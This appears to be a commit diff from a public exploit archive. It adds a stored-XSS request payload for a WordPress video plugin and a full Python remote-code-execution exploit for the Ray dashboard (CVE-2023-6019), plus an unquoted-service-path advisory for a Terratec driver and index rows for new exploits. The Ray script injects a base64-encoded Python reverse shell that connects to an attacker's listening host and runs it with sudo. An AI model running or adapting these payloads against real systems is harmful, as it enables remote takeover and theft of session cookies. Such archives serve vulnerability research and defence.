# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w
# Vulnerable Property at Request: videoFields[post_type]
# Payload: <script>alert(document.cookie)</script>
# Request:
POST /wp-admin/options.php HTTP/2
Host: erdemstar.local
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 395
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

96
exploits/python/webapps/51978.txt Normal file
View file

@ -0,0 +1,96 @@
# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
# The Ray Project dashboard contains a CPU profiling page, and the format parameter is
# not validated before being inserted into a system command executed in a shell, allowing
# for arbitrary command execution. If the system is configured to allow passwordless sudo
# (a setup some Ray configurations require) this will result in a root shell being returned
# to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================
# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3
proxies = {"http": "127.0.0.1:8080"}
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
}
def check_url(target, port):
target_url = target + ":" + port
https = 0
if 'http' not in target:
try:
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
test_url = 'http://' + target_url
response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
if response.status_code != 200:
is_https = 0
return is_https
except Exception as e:
print("ERROR! The Exception is:" + format(e))
if https == 1:
return "https://" + target_url
else:
return "http://" + target_url
def exp(target,ip,lhost, lport):
payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
print("[*]Payload is: " + payload)
b64_payload = base64.b64encode(payload.encode())
print("[*]Base64 encoding payload is: " + b64_payload.decode())
exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'
# response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
print(exp_url)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(url=exp_url, headers=headers, verify=False)
if response.status_code == 200:
print("[-]ERROR: Exploit Failed,please check the payload.")
else:
print("[+]Exploit is finished,please check your machine!")
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='''
⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄
⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃
⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄
⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄
⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
''',
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')
parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')
parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
args = parser.parse_args()
# target = args.target
ip = args.target
# port = args.port
# lhost = args.lhost
# lport = args.lport
targeturl = check_url(args.target, args.port)
print(targeturl)
print("[*] Checking in url: " + targeturl)
exp(targeturl, ip, args.lhost, args.lport)

36
exploits/windows_x86-64/local/51977.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path
# Google Dork: null
# Date: 4/10/2024
# Exploit Author: Joseph Kwabena Fiagbor
# Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/
# Software Link:
# Version: v.1.23.0.02
# Tested on: windows 7-11
# CVE : CVE-2024-31804
1. Description:
The Terratec dmx_6fire usb installs as a service with an unquoted service
path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
> C:\Users\Astra>sc qc "ttdmx6firesvc"
> {SC] QueryServiceConfig SUCCESS
>
> SERVICE_NAME: ttdmx6firesvc
> TYPE : 10 WIN32_OWN_PROCESS
> START_TYPE : 2 AUTO_START
> ERROR_CONTROL : 1 NORMAL
> BINARY_PATH_NAME : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service
> LOAD_ORDER_GROUP : PlugPlay
> TAG : 0
> DISPLAY_NAME : DMX6Fire Control
> DEPENDENCIES : eventlog
> : PlugPlay
> SERVICE_START_NAME : LocalSystem
>
>

15
files_exploits.csv
View file

@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,,2018-02-28,2018-02-28,0,CVE-2016-1887,,,,,https://cturt.github.io/sendmsg.html
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
51976,exploits/go/remote/51976.txt,"MinIO < 2024-01-31T20-20-33Z - Privilege Escalation",2024-04-12,"Jenson Zhao",remote,go,,2024-04-12,2024-04-12,0,CVE-2024-24747,,,,,
51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
51961,exploits/go/webapps/51961.txt,"Casdoor < v1.331.0 - '/api/set-password' CSRF",2024-04-02,"Van Lam Nguyen",webapps,go,,2024-04-02,2024-04-02,0,CVE-2023-34927,,,,,
51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,,
@ -10510,6 +10511,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21117,exploits/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflows",2001-10-05,kf,local,multiple,,2001-10-05,2012-09-23,1,CVE-2001-1127;OSVDB-11900,,,,,https://www.securityfocus.com/bid/3404/info
21359,exploits/multiple/local/21359.c,"Progress Database 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,local,multiple,,2002-03-22,2016-10-27,1,CVE-2001-1127;OSVDB-11904,,,,,https://www.securityfocus.com/bid/4402/info
288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple,,2001-03-03,,1,,,,,,
51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,,
43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772
21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info
47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh
@ -19479,6 +19481,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45837,exploits/php/webapps/45837.txt,"Gumbo CMS 0.99 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comgumbo-0.99beta.zip,
48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,,2020-03-03,2020-03-03,0,,,,,,
48106,exploits/php/webapps/48106.txt,"GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection",2020-02-24,emaragkos,webapps,php,,2020-02-24,2020-02-26,0,,,,,http://www.exploit-db.comeclass-1.7.3.zip,
51975,exploits/php/webapps/51975.txt,"GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload",2024-04-12,"George Tsimpidas",webapps,php,,2024-04-12,2024-04-12,0,CVE-2024-31777,,,,,
23219,exploits/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,webapps,php,,2003-10-05,2012-12-08,1,OSVDB-2625,,,,,https://www.securityfocus.com/bid/8768/info
23192,exploits/php/webapps/23192.txt,"GuppY 2.4 - HTML Injection",2003-09-29,"David Suzanne",webapps,php,,2003-09-29,2012-12-06,1,,,,,,https://www.securityfocus.com/bid/8717/info
23220,exploits/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,webapps,php,,2003-10-05,2012-12-08,1,OSVDB-3198,,,,,https://www.securityfocus.com/bid/8769/info
@ -19767,6 +19770,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27237,exploits/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",webapps,php,,2006-02-15,2013-07-31,1,,,,,,https://www.securityfocus.com/bid/16680/info
29910,exploits/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2327;OSVDB-35525,,,,,https://www.securityfocus.com/bid/23664/info
22896,exploits/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,webapps,php,,2003-07-13,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8174/info
51979,exploits/php/webapps/51979.txt,"HTMLy Version v2.9.6 - Stored XSS",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,,
2791,exploits/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",webapps,php,,2006-11-15,2016-09-16,1,CVE-2006-7134,,,,http://www.exploit-db.comupload.tar.gz,
46149,exploits/php/webapps/46149.html,"Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)",2019-01-14,AllenChen,webapps,php,,2019-01-14,2019-01-14,0,CVE-2019-6249,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comGV32-CMS_v5.7.4.zip,
32047,exploits/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,webapps,php,,2008-07-11,2014-03-04,1,,,,,,https://www.securityfocus.com/bid/30184/info
@ -23754,6 +23758,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36418,exploits/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,webapps,php,,2015-03-17,2015-03-17,0,CVE-2015-2269;OSVDB-119617,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php
34169,exploits/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith Jayathissa",webapps,php,,2014-07-27,2014-07-27,0,CVE-2014-3544;OSVDB-109337,,,,,https://moodle.org/mod/forum/discuss.php?d=264265
41828,exploits/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",webapps,php,,2017-04-06,2017-04-06,0,CVE-2017-2641,,,,,
51984,exploits/php/webapps/51984.py,"Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - _sort_ parameter",2024-04-12,"Julio Ángel Ferrari",webapps,php,,2024-04-12,2024-04-12,0,,,,,,
49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php,,2021-03-26,2021-03-26,0,,,,,,
49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",2021-04-23,UVision,webapps,php,,2021-04-23,2021-04-23,0,,,,,,
50700,exploits/php/webapps/50700.txt,"Moodle 3.11.4 - SQL Injection",2022-02-02,lavclash75,webapps,php,,2022-02-02,2022-02-02,0,CVE-2022-0332,,,,,
@ -28097,6 +28102,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5788,exploits/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,webapps,php,,2008-06-10,,1,OSVDB-46100;CVE-2008-2753;OSVDB-46099;OSVDB-46098,,,,,http://www.bugreport.ir/?/42
3121,exploits/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,webapps,php,,2007-01-11,,1,OSVDB-32807;CVE-2007-0307,,,,,
31605,exploits/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,webapps,php,,2008-04-04,2014-02-12,1,CVE-2008-1787;OSVDB-44403,,,,,https://www.securityfocus.com/bid/28608/info
51982,exploits/php/webapps/51982.txt,"PopojiCMS Version 2.0.1 - Remote Command Execution",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,,
4481,exploits/php/webapps/4481.txt,"Poppawid 2.7 - 'form' Remote File Inclusion",2007-10-02,0in,webapps,php,,2007-10-01,2016-10-12,1,OSVDB-37422;CVE-2007-5221,,,,http://www.exploit-db.compoppawid.2.7.tar.gz,
2351,exploits/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php,,2006-09-11,2016-09-09,1,,,,,http://www.exploit-db.compopper-1.41-r2.tar.gz,
25788,exploits/php/webapps/25788.txt,"Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion",2005-06-03,"Leon Juranic",webapps,php,,2005-06-03,2013-05-28,1,CVE-2005-1870;OSVDB-17085,,,,,https://www.securityfocus.com/bid/13851/info
@ -28659,7 +28665,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31481,exploits/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53025,,,,,https://www.securityfocus.com/bid/28417/info
31514,exploits/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53058,,,,,https://www.securityfocus.com/bid/28417/info
32387,exploits/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",webapps,php,,2008-09-16,2014-03-20,1,CVE-2008-4139;OSVDB-48135,,,,,https://www.securityfocus.com/bid/31210/info
51967,exploits/php/webapps/51967.txt,"Quick CMS v6.7 en 2023 - 'password' SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,,
45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,,2018-10-26,2018-10-26,0,,,,,http://www.exploit-db.comQCLxDwn_200.zip,
10837,exploits/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php,,2009-12-30,,1,,,,,,
7105,exploits/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",webapps,php,,2008-11-11,2017-01-02,1,OSVDB-47814;CVE-2008-3765,,,,,
@ -29453,7 +29458,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,,
51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-31,1,CVE-2023-2769,,,,,
51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2024-04-12,1,CVE-2023-34581,,,,,
4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php,,2007-06-20,2016-10-05,1,OSVDB-36324;CVE-2007-3358,,,,http://www.exploit-db.comserweb-0.9.4.tar.gz,
4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php,,2007-12-05,,1,OSVDB-39220;CVE-2007-6290;OSVDB-39219;CVE-2007-6289;OSVDB-39218;OSVDB-39217,,,,,
9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php,,2009-07-26,,1,,,,,,
@ -32181,10 +32186,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10632,exploits/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection",2009-12-24,molli,webapps,php,,2009-12-23,,0,,,,,,
8254,exploits/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - 'UserGallery' Blind SQL Injection",2009-03-23,Invisibility,webapps,php,,2009-03-22,,1,OSVDB-55535;CVE-2009-2311,,,,,
3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,,
51985,exploits/php/webapps/51985.txt,"WBCE 1.6.0 - Unauthenticated SQL injection",2024-04-12,"young pope",webapps,php,,2024-04-12,2024-04-12,0,,,,,,
50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,,
50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,,
51566,exploits/php/webapps/51566.txt,"WBCE CMS 1.6.1 - Open Redirect & CSRF",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
51986,exploits/php/webapps/51986.txt,"WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,,
51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,
43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,,
@ -33517,6 +33524,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35562,exploits/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting",2011-04-03,"John Leitch",webapps,php,,2011-04-03,2014-12-17,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/47142/info
45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80,2018-08-27,2018-08-28,1,CVE-2018-15877,"Command Injection",,http://www.exploit-db.com/screenshots/idlt45500/45274.png,http://www.exploit-db.complainview-activity-monitor.20161228.zip,
50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",2021-07-07,"Beren Kuday GÖRÜN",webapps,php,,2021-07-07,2021-07-07,0,CVE-2018-15877,,,,http://www.exploit-db.complainview-activity-monitor.20161228.zip,
51981,exploits/php/webapps/51981.txt,"Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)",2024-04-12,Erdemstar,webapps,php,,2024-04-12,2024-04-12,0,,,,,,
38048,exploits/php/webapps/38048.txt,"WordPress Plugin Plg Novana - 'id' SQL Injection",2012-11-22,sil3nt,webapps,php,,2012-11-22,2015-09-01,1,OSVDB-87839,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56661/info
38376,exploits/php/webapps/38376.txt,"WordPress Plugin podPress - 'playerID' Cross-Site Scripting",2013-03-11,hiphop,webapps,php,,2013-03-11,2015-10-01,1,CVE-2013-2714;OSVDB-91129,"WordPress Plugin",,,,https://www.securityfocus.com/bid/58421/info
50052,exploits/php/webapps/50052.txt,"WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection",2021-06-23,"Toby Jackson",webapps,php,,2021-06-23,2021-06-23,0,,,,,http://www.exploit-db.compolls-widget.1.5.2.zip,
@ -33923,6 +33931,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50772,exploits/php/webapps/50772.py,"WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)",2022-02-21,"Ron Jost",webapps,php,,2022-02-21,2022-02-21,0,CVE-2021-25076,,,,http://www.exploit-db.comwp-user-frontend.3.5.25.zip,
39422,exploits/php/webapps/39422.py,"WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload",2016-02-08,"Panagiotis Vagenas",webapps,php,80,2016-02-08,2016-02-08,0,,"WordPress Plugin",,,,
40850,exploits/php/webapps/40850.txt,"WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",webapps,php,,2016-11-30,2016-11-30,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-30-at-191812.png,http://www.exploit-db.comwp-vault.0.8.6.6.zip,
51987,exploits/php/webapps/51987.txt,"Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)",2024-04-12,Erdemstar,webapps,php,,2024-04-12,2024-04-12,0,,,,,,
50619,exploits/php/webapps/50619.py,"WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection",2022-01-05,"Ron Jost",webapps,php,,2022-01-05,2022-01-05,0,CVE-2021-24750,,,,http://www.exploit-db.comwp-stats-manager.4.7.zip,
44544,exploits/php/webapps/44544.php,"WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion",2018-04-26,Wadeek,webapps,php,,2018-04-26,2018-04-26,0,,,,,http://www.exploit-db.comwp-with-spritz.zip,
18353,exploits/php/webapps/18353.txt,"WordPress Plugin wp-autoyoutube - Blind SQL Injection",2012-01-12,longrifle0x,webapps,php,,2012-01-12,2012-06-22,0,OSVDB-82542,"WordPress Plugin",,,http://www.exploit-db.comwp-autoyoutube.0.1.zip,
@ -34912,6 +34921,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
